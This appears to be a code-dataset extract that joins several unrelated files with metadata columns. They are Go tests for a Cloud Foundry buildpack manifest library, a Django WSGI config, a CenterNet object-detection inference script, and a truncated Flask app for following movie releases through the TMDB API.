Expect(buffer.String()).NotTo(ContainSubstring("newer version"))
})
})
Context("version is not semver", func() {
BeforeEach(func() {
tgzContents, err := ioutil.ReadFile("fixtures/thing.tgz")
Expect(err).To(BeNil())
httpmock.RegisterResponder("GET", "https://buildpacks.cloudfoundry.org/dependencies/godep/godep-v79-linux-x64-9e37ce0f.tgz",
httpmock.NewStringResponder(200, string(tgzContents)))
})
It("does not warn the user", func() {
err = manifest.InstallDependency(libbuildpack.Dependency{Name: "godep", Version: "v79"}, outputDir)
Expect(err).To(BeNil())
Expect(buffer.String()).NotTo(ContainSubstring("newer version"))
})
})
Context("version has an EOL, version line is major", func() {
const warning = "**WARNING** thing 4.x will no longer be available in new buildpacks released after 2017-03-01."
BeforeEach(func() {
tgzContents, err := ioutil.ReadFile("fixtures/thing.tgz")
Expect(err).To(BeNil())
httpmock.RegisterResponder("GET", "https://example.com/dependencies/thing-4.6.1-linux-x64.tgz",
httpmock.NewStringResponder(200, string(tgzContents)))
})
Context("less than 30 days in the future", func() {
BeforeEach(func() {
currentTime, err = time.Parse("2006-01-02", "2017-02-15")
Expect(err).To(BeNil())
})
It("warns the user", func() {
err = manifest.InstallDependency(libbuildpack.Dependency{Name: "thing", Version: "4.6.1"}, outputDir)
Expect(err).To(BeNil())
Expect(buffer.String()).To(ContainSubstring(warning))
})
Context("dependency EOL has a link associated with it", func() {
It("includes the link in the warning", func() {
err = manifest.InstallDependency(libbuildpack.Dependency{Name: "thing", Version: "4.6.1"}, outputDir)
Expect(err).To(BeNil())
Expect(buffer.String()).To(ContainSubstring("See: http://example.com/eol-policy"))
})
})
Context("dependency EOL does not have a link associated with it", func() {
BeforeEach(func() {
tgzContents, err := ioutil.ReadFile("fixtures/thing.tgz")
Expect(err).To(BeNil())
httpmock.RegisterResponder("GET", "https://example.com/dependencies/thing-5.2.3-linux-x64.tgz",
httpmock.NewStringResponder(200, string(tgzContents)))
})
It("does not include the word 'See:' in the warning", func() {
err = manifest.InstallDependency(libbuildpack.Dependency{Name: "thing", Version: "5.2.3"}, outputDir)
Expect(err).To(BeNil())
Expect(buffer.String()).ToNot(ContainSubstring("See:"))
})
})
})
Context("in the past", func() {
BeforeEach(func() {
currentTime, err = time.Parse("2006-01-02", "2017-12-15")
Expect(err).To(BeNil())
})
It("warns the user", func() {
err = manifest.InstallDependency(libbuildpack.Dependency{Name: "thing", Version: "4.6.1"}, outputDir)
Expect(err).To(BeNil())
Expect(buffer.String()).To(ContainSubstring(warning))
})
})
Context("more than 30 days in the future", func() {
BeforeEach(func() {
currentTime, err = time.Parse("2006-01-02", "2016-10-15")
Expect(err).To(BeNil())
})
It("does not warn the user", func() {
err = manifest.InstallDependency(libbuildpack.Dependency{Name: "thing", Version: "4.6.1"}, outputDir)
Expect(err).To(BeNil())
Expect(buffer.String()).ToNot(ContainSubstring(warning))
})
})
})
Context("version has an EOL, version line is major + minor", func() {
const warning = "**WARNING** thing 6.2.x will no longer be available in new buildpacks released after 2018-04-01"
BeforeEach(func() {
tgzContents, err := ioutil.ReadFile("fixtures/thing.tgz")
Expect(err).To(BeNil())
httpmock.RegisterResponder("GET", "https://example.com/dependencies/thing-6.2.3-linux-x64.tgz",
httpmock.NewStringResponder(200, string(tgzContents)))
})
Context("less than 30 days in the future", func() {
BeforeEach(func() {
currentTime, err = time.Parse("2006-01-02", "2018-03-29")
Expect(err).To(BeNil())
})
It("warns the user", func() {
err = manifest.InstallDependency(libbuildpack.Dependency{Name: "thing", Version: "6.2.3"}, outputDir)
Expect(err).To(BeNil())
Expect(buffer.String()).To(ContainSubstring(warning))
})
})
Context("in the past", func() {
BeforeEach(func() {
currentTime, err = time.Parse("2006-01-02", "2019-12-30")
Expect(err).To(BeNil())
})
It("warns the user", func() {
err = manifest.InstallDependency(libbuildpack.Dependency{Name: "thing", Version: "6.2.3"}, outputDir)
Expect(err).To(BeNil())
Expect(buffer.String()).To(ContainSubstring(warning))
})
})
Context("more than 30 days in the future", func() {
BeforeEach(func() {
currentTime, err = time.Parse("2006-01-02", "2018-01-15")
Expect(err).To(BeNil())
})
It("does not warn the user", func() {
err = manifest.InstallDependency(libbuildpack.Dependency{Name: "thing", Version: "6.2.3"}, outputDir)
Expect(err).To(BeNil())
Expect(buffer.String()).ToNot(ContainSubstring(warning))
})
})
})
Context("version has an EOL, version line non semver", func() {
const warning = "**WARNING** nonsemver abc-1.2.3-def-4.5.6 will no longer be available in new buildpacks released after 2018-04-01"
BeforeEach(func() {
tgzContents, err := ioutil.ReadFile("fixtures/thing.tgz")
Expect(err).To(BeNil())
httpmock.RegisterResponder("GET", "https://example.com/dependencies/nonsemver-abc-1.2.3-def-4.5.6-linux-x64.tgz",
httpmock.NewStringResponder(200, string(tgzContents)))
})
Context("less than 30 days in the future", func() {
BeforeEach(func() {
currentTime, err = time.Parse("2006-01-02", "2018-03-29")
Expect(err).To(BeNil())
})
It("warns the user", func() {
err = manifest.InstallDependency(libbuildpack.Dependency{Name: "nonsemver", Version: "abc-1.2.3-def-4.5.6"}, outputDir)
Expect(err).To(BeNil())
Expect(buffer.String()).To(ContainSubstring(warning))
})
})
Context("in the past", func() {
BeforeEach(func() {
currentTime, err = time.Parse("2006-01-02", "2019-12-30")
Expect(err).To(BeNil())
})
It("warns the user", func() {
err = manifest.InstallDependency(libbuildpack.Dependency{Name: "nonsemver", Version: "abc-1.2.3-def-4.5.6"}, outputDir)
Expect(err).To(BeNil())
Expect(buffer.String()).To(ContainSubstring(warning))
})
})
Context("more than 30 days in the future", func() {
BeforeEach(func() {
currentTime, err = time.Parse("2006-01-02", "2018-01-15")
Expect(err).To(BeNil())
})
It("does not warn the user", func() {
err = manifest.InstallDependency(libbuildpack.Dependency{Name: "nonsemver", Version: "abc-1.2.3-def-4.5.6"}, outputDir)
Expect(err).To(BeNil())
Expect(buffer.String()).ToNot(ContainSubstring(warning))
})
})
})
Context("version does not have an EOL", func() {
const warning = "**WARNING** real_tar_file 3 will no longer be available in new buildpacks released after"
BeforeEach(func() {
tgzContents, err := ioutil.ReadFile("fixtures/thing.tgz")
Expect(err).To(BeNil())
httpmock.RegisterResponder("GET", "https://example.com/dependencies/real_tar_file-3-linux-x64.tgz",
httpmock.NewStringResponder(200, string(tgzContents)))
})
It("does not warn the user", func() {
err = manifest.InstallDependency(libbuildpack.Dependency{Name: "real_tar_file", Version: "3"}, outputDir)
Expect(err).To(BeNil())
Expect(buffer.String()).ToNot(ContainSubstring(warning))
})
})
})
Context("url exists but does not match md5", func() {
BeforeEach(func() {
httpmock.RegisterResponder("GET", "https://example.com/dependencies/thing-1-linux-x64.tgz",
httpmock.NewStringResponder(200, "other data"))
})
It("logs the name and version of the dependency", func() {
err = manifest.InstallDependency(libbuildpack.Dependency{Name: "thing", Version: "1"}, outputDir)
Expect(err).ToNot(BeNil())
Expect(buffer.String()).To(ContainSubstring("-----> Installing thing 1"))
})
It("outputfile does not exist", func() {
err = manifest.InstallDependency(libbuildpack.Dependency{Name: "thing", Version: "1"}, outputDir)
Expect(err).ToNot(BeNil())
Expect(filepath.Join(outputDir, "root.txt")).ToNot(BeAnExistingFile())
})
})
})
Context("cached", func() {
var (
dependenciesDir string
outputDir string
)
BeforeEach(func() {
manifestDir, err = ioutil.TempDir("", "cached")
Expect(err).To(BeNil())
dependenciesDir = filepath.Join(manifestDir, "dependencies")
os.MkdirAll(dependenciesDir, 0755)
data, err := ioutil.ReadFile("fixtures/manifest/fetch/manifest.yml")
Expect(err).To(BeNil())
err = ioutil.WriteFile(filepath.Join(manifestDir, "manifest.yml"), data, 0644)
Expect(err).To(BeNil())
outputDir, err = ioutil.TempDir("", "downloads")
Expect(err).To(BeNil())
})
Context("url exists cached on disk and matches md5", func() {
BeforeEach(func() {
libbuildpack.CopyFile("fixtures/thing.zip", filepath.Join(dependenciesDir, "https___example.com_dependencies_real_zip_file-3-linux-x64.zip"))
})
It("logs the name and version of the dependency", func() {
err = manifest.InstallDependency(libbuildpack.Dependency{Name: "real_zip_file", Version: "3"}, outputDir)
Expect(err).To(BeNil())
Expect(buffer.String()).To(ContainSubstring("-----> Installing real_zip_file 3"))
})
It("extracts a file at the root", func() {
err = manifest.InstallDependency(libbuildpack.Dependency{Name: "real_zip_file", Version: "3"}, outputDir)
Expect(err).To(BeNil())
Expect(filepath.Join(outputDir, "root.txt")).To(BeAnExistingFile())
Expect(ioutil.ReadFile(filepath.Join(outputDir, "root.txt"))).To(Equal([]byte("root\n")))
})
It("extracts a nested file", func() {
err = manifest.InstallDependency(libbuildpack.Dependency{Name: "real_zip_file", Version: "3"}, outputDir)
Expect(err).To(BeNil())
Expect(filepath.Join(outputDir, "thing", "bin", "file2.exe")).To(BeAnExistingFile())
Expect(ioutil.ReadFile(filepath.Join(outputDir, "thing", "bin", "file2.exe"))).To(Equal([]byte("progam2\n")))
})
It("makes intermediate directories", func() {
outputDir = filepath.Join(outputDir, "notexist")
err = manifest.InstallDependency(libbuildpack.Dependency{Name: "real_zip_file", Version: "3"}, outputDir)
Expect(err).To(BeNil())
Expect(filepath.Join(outputDir, "thing", "bin", "file2.exe")).To(BeAnExistingFile())
Expect(ioutil.ReadFile(filepath.Join(outputDir, "thing", "bin", "file2.exe"))).To(Equal([]byte("progam2\n")))
})
})
})
})
Describe("InstallOnlyVersion", func() {
var outputDir string
BeforeEach(func() {
manifestDir = "fixtures/manifest/fetch"
outputDir, err = ioutil.TempDir("", "downloads")
Expect(err).To(BeNil())
})
AfterEach(func() { err = os.RemoveAll(outputDir); Expect(err).To(BeNil()) })
Context("there is only one version of the dependency", func() {
BeforeEach(func() {
tgzContents, err := ioutil.ReadFile("fixtures/thing.tgz")
Expect(err).To(BeNil())
httpmock.RegisterResponder("GET", "https://example.com/dependencies/real_tar_file-3-linux-x64.tgz",
httpmock.NewStringResponder(200, string(tgzContents)))
})
It("installs", func() {
outputDir = filepath.Join(outputDir, "notexist")
err = manifest.InstallOnlyVersion("real_tar_file", outputDir)
Expect(err).To(BeNil())
Expect(filepath.Join(outputDir, "thing", "bin", "file2.exe")).To(BeAnExistingFile())
Expect(ioutil.ReadFile(filepath.Join(outputDir, "thing", "bin", "file2.exe"))).To(Equal([]byte("progam2\n")))
})
})
Context("there is more than one version of the dependency", func() {
It("fails", func() {
outputDir = filepath.Join(outputDir, "notexist")
err = manifest.InstallOnlyVersion("thing", outputDir)
Expect(err).NotTo(BeNil())
Expect(err.Error()).To(Equal("more than one version of thing found"))
})
})
Context("there are no versions of the dependency", func() {
It("fails", func() {
outputDir = filepath.Join(outputDir, "notexist")
err = manifest.InstallOnlyVersion("not_a_dependency", outputDir)
Expect(err).NotTo(BeNil())
Expect(err.Error()).To(Equal("no versions of not_a_dependency found"))
})
})
})
Describe("DefaultVersion", func() {
Context("requested name exists and default version is locked to the patch", func() {
It("returns the default", func() {
dep, err := manifest.DefaultVersion("node")
Expect(err).To(BeNil())
Expect(dep).To(Equal(libbuildpack.Dependency{Name: "node", Version: "6.9.4"}))
})
})
Context("requested name exists multiple times in dependencies and default version is locked to minor line", func() {
It("returns the default", func() {
dep, err := manifest.DefaultVersion("jruby")
Expect(err).To(BeNil())
Expect(dep).To(Equal(libbuildpack.Dependency{Name: "jruby", Version: "9.3.5"}))
})
})
Context("requested name exists multiple times in dependencies and default version is locked to major line", func() {
It("returns the default", func() {
dep, err := manifest.DefaultVersion("ruby")
Expect(err).To(BeNil())
Expect(dep).To(Equal(libbuildpack.Dependency{Name: "ruby", Version: "2.3.3"}))
})
})
Context("requested name exists (twice) in default version section", func() {
BeforeEach(func() { manifestDir = "fixtures/manifest/duplicate" })
It("returns an error", func() {
_, err := manifest.DefaultVersion("bower")
Expect(err).ToNot(BeNil())
Expect(err.Error()).To(Equal("found 2 default versions for bower"))
})
})
Context("requested name does not exist", func() {
It("returns an error", func() {
_, err := manifest.DefaultVersion("notexist")
Expect(err).ToNot(BeNil())
Expect(err.Error()).To(Equal("no default version for notexist"))
})
})
})
Describe("CheckBuildpackVersion", func() {
var cacheDir string
BeforeEach(func() {
cacheDir, err = ioutil.TempDir("", "cache")
})
AfterEach(func() {
err = os.RemoveAll(cacheDir)
Expect(err).To(BeNil())
})
Context("BUILDPACK_METADATA exists", func() {
Context("The language does not match", func() {
BeforeEach(func() {
metadata := "---\nlanguage: diffLang\nversion: 99.99"
ioutil.WriteFile(filepath.Join(cacheDir, "BUILDPACK_METADATA"), []byte(metadata), 0666)
})
It("Does not log anything", func() {
manifest.CheckBuildpackVersion(cacheDir)
Expect(buffer.String()).To(Equal(""))
})
})
Context("The language matches", func() {
Context("The version matches", func() {
BeforeEach(func() {
metadata := "---\nlanguage: dotnet-core\nversion: 99.99"
ioutil.WriteFile(filepath.Join(cacheDir, "BUILDPACK_METADATA"), []byte(metadata), 0666)
})
It("Does not log anything", func() {
manifest.CheckBuildpackVersion(cacheDir)
Expect(buffer.String()).To(Equal(""))
})
})
Context("The version does not match", func() {
BeforeEach(func() {
metadata := "---\nlanguage: dotnet-core\nversion: 33.99"
ioutil.WriteFile(filepath.Join(cacheDir, "BUILDPACK_METADATA"), []byte(metadata), 0666)
})
It("Logs a warning that the buildpack version has changed", func() {
manifest.CheckBuildpackVersion(cacheDir)
Expect(buffer.String()).To(ContainSubstring("buildpack version changed from 33.99 to 99.99"))
})
})
})
})
Context("BUILDPACK_METADATA does not exist", func() {
It("Does not log anything", func() {
manifest.CheckBuildpackVersion(cacheDir)
Expect(buffer.String()).To(Equal(""))
})
})
})
Describe("StoreBuildpackMetadata", func() {
var cacheDir string
BeforeEach(func() {
cacheDir, err = ioutil.TempDir("", "cache")
})
AfterEach(func() {
err = os.RemoveAll(cacheDir)
Expect(err).To(BeNil())
})
Context("VERSION file exists", func() {
Context("cache dir exists", func() {
It("writes to the BUILDPACK_METADATA file", func() {
manifest.StoreBuildpackMetadata(cacheDir)
var md libbuildpack.BuildpackMetadata
y := &libbuildpack.YAML{}
err = y.Load(filepath.Join(cacheDir, "BUILDPACK_METADATA"), &md)
Expect(err).To(BeNil())
Expect(md.Language).To(Equal("dotnet-core"))
Expect(md.Version).To(Equal("99.99"))
})
})
Context("cache dir does not exist", func() {
It("Does not log anything", func() {
manifest.StoreBuildpackMetadata(filepath.Join(cacheDir, "not_exist"))
Expect(buffer.String()).To(Equal(""))
Expect(filepath.Join(cacheDir, "not_exist")).ToNot(BeADirectory())
})
})
})
Context("VERSION file does not exist", func() {
BeforeEach(func() {
manifestDir = "fixtures/manifest/stacks"
})
It("Does not log anything", func() {
manifest.StoreBuildpackMetadata(cacheDir)
Expect(buffer.String()).To(Equal(""))
})
})
})
})
|
[
"\"CF_STACK\""
] |
[] |
[
"CF_STACK"
] |
[]
|
["CF_STACK"]
|
go
| 1 | 0 | |
MrsKsMathCram/MrsKsMathCram/wsgi.py
|
"""
WSGI config for MrsKsMathCram project.
It exposes the WSGI callable as a module-level variable named ``application``.
For more information on this file, see
https://docs.djangoproject.com/en/2.2/howto/deployment/wsgi/
"""
import os
from django.core.wsgi import get_wsgi_application
os.environ.setdefault('DJANGO_SETTINGS_MODULE', 'MrsKsMathCram.settings')
application = get_wsgi_application()
|
[] |
[] |
[] |
[]
|
[]
|
python
| 0 | 0 | |
inference.py
|
from generators.csv_ import CSVGenerator
from models.resnet import centernet
import cv2
import os
import numpy as np
import time
from generators.utils import affine_transform, get_affine_transform
from utils.image import read_image_bgr, preprocess_image, resize_image
import os.path as osp
DATA_SUFFIX = '_datamap.png'
RESULT_PATH = "result/"
PROCESS_PATH = "process/"
model_path = 'checkpoints/csv.h5'
colors = [(255, 0, 0), (0, 255, 0), (0, 0, 255)]
score_threshold = 0.5
flip_test = False
os.environ['CUDA_VISIBLE_DEVICES'] = '0'
generator = CSVGenerator(
'data/annotations.csv',
'data/classes.csv',
'data',
)
num_classes = generator.num_classes()
classes = list(generator.classes.keys())
model, prediction_model, debug_model = centernet(num_classes=num_classes,
nms=True,
flip_test=flip_test,
freeze_bn=False,
score_threshold=score_threshold)
prediction_model.load_weights(model_path, by_name=True, skip_mismatch=True)
for f in os.listdir(PROCESS_PATH):
if f.endswith(DATA_SUFFIX):
image = read_image_bgr(PROCESS_PATH + f)
src_image = image.copy()
c = np.array([image.shape[1] / 2., image.shape[0] / 2.], dtype=np.float32)
s = max(image.shape[0], image.shape[1]) * 1.0
tgt_w = generator.input_size
tgt_h = generator.input_size
trans_input = get_affine_transform(c, s, (tgt_w, tgt_h))
image = cv2.warpAffine(image, trans_input, (tgt_w, tgt_h), flags=cv2.INTER_LINEAR)
image = image.astype(np.float32)
image[..., 0] -= 103.939
image[..., 1] -= 116.779
image[..., 2] -= 123.68
print(image.shape)
if flip_test:
flipped_image = image[:, ::-1]
inputs = np.stack([image, flipped_image], axis=0)
else:
inputs = np.expand_dims(image, axis=0)
# run network
start = time.time()
detections = prediction_model.predict_on_batch(inputs)[0]
print(time.time() - start)
scores = detections[:, 4]
# select indices which have a score above the threshold
indices = np.where(scores > score_threshold)[0]
# select those detections
detections = detections[indices]
detections_copy = detections.copy()
detections = detections.astype(np.float64)
trans = get_affine_transform(c, s, (tgt_w // 4, tgt_h // 4), inv=1)
for j in range(detections.shape[0]):
detections[j, 0:2] = affine_transform(detections[j, 0:2], trans)
detections[j, 2:4] = affine_transform(detections[j, 2:4], trans)
detections[:, [0, 2]] = np.clip(detections[:, [0, 2]], 0, src_image.shape[1])
detections[:, [1, 3]] = np.clip(detections[:, [1, 3]], 0, src_image.shape[0])
with open(RESULT_PATH + f[:-len(DATA_SUFFIX)] + '.txt', 'w') as output:
for detection in detections:
xmin = int(round(detection[0]))
ymin = int(round(detection[1]))
xmax = int(round(detection[2]))
ymax = int(round(detection[3]))
score = '{:.4f}'.format(detection[4])
class_id = int(detection[5])
print(f'{xmin},{ymin},{xmax},{ymax},{class_id}', file=output)
color = colors[class_id]
class_name = classes[class_id]
label = '-'.join([class_name, score])
ret, baseline = cv2.getTextSize(label, cv2.FONT_HERSHEY_SIMPLEX, 1.5, 1)
cv2.rectangle(src_image, (xmin, ymin), (xmax, ymax), color, 4)
cv2.rectangle(src_image, (xmin, ymax - ret[1] - baseline), (xmin + ret[0], ymax), color, -1)
cv2.putText(src_image, label, (xmin, ymax - baseline), cv2.FONT_HERSHEY_SIMPLEX, 1.5, (0, 0, 0), 2)
cv2.imwrite(RESULT_PATH + f[:-len(DATA_SUFFIX)] + '_result.png', src_image)
#cv2.namedWindow('image', cv2.WINDOW_NORMAL)
#cv2.imshow('image', src_image)
#key = cv2.waitKey(0)
|
[] |
[] |
[
"CUDA_VISIBLE_DEVICES"
] |
[]
|
["CUDA_VISIBLE_DEVICES"]
|
python
| 1 | 0 | |
app.py
|
import os
import configuration
import re
import requests
import math
from datetime import date
from dateutil.relativedelta import relativedelta
from flask import Flask
from flask_sqlalchemy import SQLAlchemy
from flask import flash, g, redirect, render_template, request, url_for, session
from itsdangerous import TimedJSONWebSignatureSerializer as Serializer
from werkzeug.security import generate_password_hash, check_password_hash
from api import multiSearch, lookupById, lookupTvById, lookupReleaseDate, lookupReleaseDatee, lookupRelatedTv, lookupRelatedMovies, lookupUpcoming, lookupPopular, lookupRecent, lookupPersonMovies, lookupPersonProfile, lookupGenre, lookupTvGenre
from utilities import login_required, check_confirmed, generate_confirmation_token, confirm_token, get_locale
from emailer import send_release_mail, send_reset_mail, send_confirmation_email
from datetime import datetime
# define our flask app
app = Flask(__name__)
# setting up config
app.config.update(
SECRET_KEY = configuration.SECRET_KEY_STORAGE,
SESSION_COOKIE_SECURE=True,
SESSION_COOKIE_HTTPONLY=True,
SESSION_COOKIE_SAMESITE='Lax'
)
# used to switch DB
ENV = 'launch'
if ENV == 'dev':
app.config['SQLALCHEMY_DATABASE_URI'] = configuration.DATABASE_URL
else:
app.config['SQLALCHEMY_DATABASE_URI'] = os.environ.get('DATABASE_URL')
# gets rid of annoying error message
app.config['SQLALCHEMY_TRACK_MODIFICATIONS'] = False
# init db
db = SQLAlchemy(app)
# our database models
class User(db.Model):
__tablename__ = 'users'
id = db.Column(db.Integer, primary_key=True)
username = db.Column(db.String(50), unique=True)
password = db.Column(db.String(255))
confirmed = db.Column(db.Boolean, default=False)
def get_reset_token(self, expires_sec=1800):
s = Serializer(app.config['SECRET_KEY'], expires_sec)
return s.dumps({'user_id': self.id}).decode('utf8')
@staticmethod
def verify_reset_token(token):
s = Serializer(app.config['SECRET_KEY'])
try:
user_id = s.loads(token)['user_id']
except:
return None
return User.query.get(user_id)
def __init__(self, username, password, confirmed):
self.username = username
self.password = password
self.confirmed = confirmed
class Follows(db.Model):
__tablename__ = 'follows'
follow_id = db.Column(db.Integer, primary_key=True)
user_id = db.Column(db.Integer)
movie_id = db.Column(db.Integer)
movie_title = db.Column(db.String)
movie_date = db.Column(db.Text())
movie_type = db.Column(db.String)
def __init__(self, user_id, movie_id, movie_title, movie_date, movie_type):
self.user_id = user_id
self.movie_id = movie_id
self.movie_title = movie_title
self.movie_date = movie_date
self.movie_type = movie_type
# main page route
@app.route('/', methods=('GET', 'POST'))
def index():
# acquire the movie title from form and pass it to the results page
if request.method == 'POST':
query = request.form['movie_title']
# parse input to make sure its not empty and that the search will return some results
if query == '':
error = 'Please provide a movie title'
# parse input to make sure it has some results
elif multiSearch(query) == []:
error = 'Please refine your search query to be more specific'
# if valid and results are found - redirect to results page - passing the query
else:
# New multisearch function implementation
return redirect(url_for('results', query=query))
flash(error, 'warning')
# get request will display index
return render_template('dashboard/index.html', home=True)
# results route - takes one argument which is the query string
@app.route('/results', methods=('GET', 'POST'))
def results():
page_chunk = 2
query = request.args.get('query')
try:
adult = session['adult']
except Exception as e:
adult = 'false'
pass
# New multisearch function implementation
pageCount = math.ceil(requests.get(
f"https://api.themoviedb.org/3/search/multi?api_key={configuration.API_KEY_STORAGE}&language=en-US&query={query}&include_adult={adult}®ion=US").json()["total_pages"] / page_chunk)
page = request.args.get('page')
if page is None:
page = 1
else:
page = int(page)
# use our api to get results based on query string
searchQuery = multiSearch(query, page, adult)
# render template with results
if request.method == 'GET':
if searchQuery == []:
error = 'Please refine your search query to be more specific'
else:
return render_template('search/results.html', results=searchQuery, page=page, pageCount=pageCount, query=query)
flash(error, 'warning')
return redirect(url_for('index'))
# if user clicks the follow button
elif request.method == 'POST':
# get the movie id from the form and look it up in our api
id = request.form['movie_id']
# Insert follow into database and get error (if any)
error = insert_single_follow(id)
if error:
# flash error message
flash(error, 'warning')
return render_template('search/results.html', results=searchQuery, page=page, pageCount=pageCount, query=query)
# details route to show movie info and imdb link / takes one arguement (id of the movie)
@app.route('/details/<string:mediaType>/<int:id>', methods=('GET', 'POST'))
def details(id, mediaType):
# For TV
if mediaType == 'tv':
movie = lookupTvById(id)
related = lookupRelatedTv(id)
release = movie[0]['release_full']
release_year = movie[0]['release_year']
bg = movie[0]['backdrop']
# For Movies
elif mediaType == 'movie':
movie = lookupById(id)
related = lookupRelatedMovies(id)
test_date = lookupReleaseDatee(id)
bg = movie[0]['backdrop']
# if get - then get api information and pass that to the template
if request.method == 'GET':
if mediaType == 'movie':
if movie[0]['release_full'] == 'N/A':
release_year = 'N/A'
release = 'N/A'
else:
if movie[0]['release_obj']['theatre']['full'] != 'TBA':
date_obj = datetime.strptime(movie[0]['release_obj']['theatre']['full'], '%B %d, %Y')
release_year = date_obj.strftime('%Y')
release = movie[0]['release_obj']['theatre']['full']
elif movie[0]['release_obj']['digital']['full'] != 'TBA':
date_obj = datetime.strptime(movie[0]['release_obj']['digital']['full'], '%B %d, %Y')
release_year = date_obj.strftime('%Y')
release = movie[0]['release_obj']['digital']['full']
else:
date_obj = datetime.strptime(movie[0]['release_full'], '%B %d, %Y')
release_year = date_obj.strftime('%Y')
release = movie[0]['release_full']
return render_template('search/details.html', details=movie, release=release, year=release_year, related=related, mediaType=mediaType, bg = bg, title=movie[0]['name'])
# else if they click the follow button
elif request.method == 'POST':
# Adding functionality to follow either theatre / digital release OR both
theatre = request.form.get('theatrical')
digital = request.form.get('digital')
# Insert follow(s) into database
error = insert_follows(id, theatre, digital)
# flash any error message
if error:
flash(error, 'warning')
return redirect(url_for('follows'))
# Upcoming movies
@app.route('/upcoming', methods=('GET', 'POST'))
def upcoming():
# Get three months ahead date - to cap our upcoming end date
three_months_ahead = date.today() + relativedelta(months=+3)
# Set page chunk size which will grab X amount of pages from the api_key
# And also be used to divide our total page count by to get an accurate page total
page_chunk = 2
# Get today's date for the start date of our query
today = date.today()
# Get sort by preference --- default is popularity descending
sort_by = request.args.get('sort_by') or 'popularity.desc'
# Get the page count of available results from the API and store it in a variable
pageCount = math.ceil(requests.get(
f"https://api.themoviedb.org/3/discover/movie?api_key={configuration.API_KEY_STORAGE}&language=en-US&sort_by={sort_by}&include_adult=true&include_video=false&primary_release_date.gte={today}&primary_release_date.lte={three_months_ahead}").json()["total_pages"] / page_chunk)
# Get current page
page = request.args.get('page')
# Set page value to 1 or if an argument is passed in - that value
if page is None:
page = 1
else:
page = int(page)
# Query our api
results = lookupUpcoming(page, sort_by)
# render template with results
if request.method == 'GET':
if results == []:
return redirect(url_for('index'))
return render_template('search/upcoming.html', results=results, pageCount=pageCount, page=page, sort_by=sort_by)
# if user clicks the follow button
elif request.method == 'POST':
# get the movie id from the form and look it up in our api
id = request.form['movie_id']
# Insert follow into database and get error (if any)
error = insert_single_follow(id)
if error is not None:
# flash error message
flash(error, 'warning')
return render_template('search/upcoming.html', results=results, pageCount=pageCount, page=page, sort_by=sort_by)
# Upcoming movies
@app.route('/recent', methods=('GET', 'POST'))
def recent():
one_month_behind = date.today() + relativedelta(months=-1)
today = date.today()
# Set page chunk size which will grab X amount of pages from the api_key
# And also be used to divide our total page count by to get an accurate page total
page_chunk = 2
# Get today's date for the start date of our query
today = date.today()
# Get sort by preference --- default is popularity descending
sort_by = request.args.get('sort_by') or 'popularity.desc'
# Get the page count of available results from the API and store it in a variable
pageCount = math.ceil(requests.get(
f"https://api.themoviedb.org/3/discover/movie?api_key={configuration.API_KEY_STORAGE}&language=en-US&sort_by={sort_by}&include_adult=true&include_video=false&primary_release_date.lte={today}&primary_release_date.gte={one_month_behind}").json()["total_pages"] / page_chunk)
# Get current page
page = request.args.get('page')
# Set page value to 1 or if an argument is passed in - that value
if page is None:
page = 1
else:
page = int(page)
# Query our api
results = lookupRecent(page, sort_by)
# render template with results
if request.method == 'GET':
# In rare case where recent final page returns an empy list
if results == []:
results = lookupRecent(page - 1, sort_by)
pageCount = pageCount - 1
return render_template('search/recent.html', results=results, pageCount=pageCount, page=page - 1, sort_by=sort_by)
return render_template('search/recent.html', results=results, pageCount=pageCount, page=page, sort_by=sort_by)
# if user clicks the follow button
elif request.method == 'POST':
# get the movie id from the form and look it up in our api
id = request.form['movie_id']
# Insert follow into database and get error (if any)
error = insert_single_follow(id)
if error is not None:
# flash error message
flash(error, 'warning')
return render_template('search/recent.html', results=results, pageCount=pageCount, page=page, sort_by=sort_by)
@app.route('/popular', methods=('GET', 'POST'))
def popular():
# Set page chunk value
page_chunk = 2
# Calculate page count
pageCount = math.ceil(requests.get(
f"https://api.themoviedb.org/3/movie/popular?api_key={configuration.API_KEY_STORAGE}&language=en-US®ion=US").json()["total_pages"] / page_chunk)
# Get current page
page = request.args.get('page')
# Set page to 1 or convert page to an int
if page is None:
page = 1
else:
page = int(page)
# Query the api
popularMovies = lookupPopular(page)
# Sort by most popular
def sort(e):
return e['popularity']
popularMovies.sort(reverse=True, key=sort)
# render template with results
if request.method == 'GET':
if popularMovies == []:
return redirect(url_for('index'))
return render_template('search/popular.html', results=popularMovies, page=page, pageCount=pageCount)
# if user clicks the follow button
elif request.method == 'POST':
# get the movie id from the form and look it up in our api
id = request.form['movie_id']
# Insert follow into database and get error (if any)
error = insert_single_follow(id)
if error is not None:
# flash error message
flash(error, 'warning')
return render_template('search/popular.html', results=popularMovies, page=page, pageCount=pageCount)
@app.route('/people/filmography/<int:id>/<string:name>', methods=('GET', 'POST'))
def peoplemovies(id, name):
# Set page count and page to 1 - only one page is returned
pageCount = 1
page = 1
# use our api to get results based on query string
searchQuery = lookupPersonMovies(id)
# render template with results
if request.method == 'GET':
if searchQuery == []:
error = 'Please refine your search query to be more specific'
else:
return render_template('search/results.html', results=searchQuery, page=page, pageCount=pageCount, query=id, name=name)
flash(error, 'warning')
return redirect(url_for('index'))
# if user clicks the follow button
elif request.method == 'POST':
# get the movie id from the form and look it up in our api
id = request.form['movie_id']
# Insert follow into database and get error (if any)
error = insert_single_follow(id)
if error is not None:
# flash error message
flash(error, 'warning')
return render_template('search/results.html', results=searchQuery, page=page, pageCount=pageCount, query=id, name=name)
@app.route('/genres/<string:mediaType>/<int:genre>/<genrename>', methods=('GET', 'POST'))
def genres(mediaType, genre, genrename):
# Get sort order and current page from req args
sort_by = request.args.get('sort_by') or 'popularity.desc'
page = request.args.get('page')
# three_months_ahead = date.today() + relativedelta(months=+3)
# three_months_behind = date.today() + relativedelta(months=-3)
# If no page provided - page is 1
if page is None:
page = 1
# Else - convert the page into an integer
else:
page = int(page)
# Set our page chunk count which grabs X amount of pages from the api
page_chunk = 2
# For movies
if mediaType == 'movie':
# Get page count
pageCount = math.ceil(requests.get(
f"https://api.themoviedb.org/3/discover/movie?api_key={configuration.API_KEY_STORAGE}&language=en-US&sort_by={sort_by}&include_adult=false&include_video=false&with_genres={genre}").json()["total_pages"] / page_chunk)
# Query the api
searchQuery = lookupGenre('movie', genre, page, sort_by)
# For TV
elif mediaType == 'tv':
# Get the page count
pageCount = math.ceil(requests.get(
f"https://api.themoviedb.org/3/discover/tv?api_key={configuration.API_KEY_STORAGE}&language=en-US&sort_by={sort_by}&include_adult=false&include_video=false&with_genres={genre}").json()["total_pages"] / page_chunk)
# Query the api
